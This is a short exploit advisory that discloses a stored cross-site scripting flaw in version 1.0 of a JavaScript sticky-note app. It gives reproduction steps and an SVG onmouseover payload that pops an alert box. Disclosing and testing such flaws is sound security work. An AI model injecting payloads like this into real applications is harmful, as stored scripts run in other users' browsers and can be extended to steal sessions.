Sticky Notes Apps using JavaScript version 1.0 suffers from a persistent cross site scripting vulnerability.
c34812b56f1fa2ae36a2816630cf1b86
# Exploit Title: Sticky Note Apps using JavaScript | Stored Cross Site Scripting
# Exploit Author: Richard Jones
# Date: 2021-03-09
# Vendor Homepage:
https://www.sourcecodester.com/javascript/14742/sticky-note-apps-using-javascript-source-code.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=14742&title=Sticky+Note+Apps+using+JavaScript+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
Steps to Exploit.
1. Open the application
2. Add a new note with the payload below.
3. Mouse hover over the new posted note
Payload:
<svg onmouseover="alert(`Stored XSS`)"/>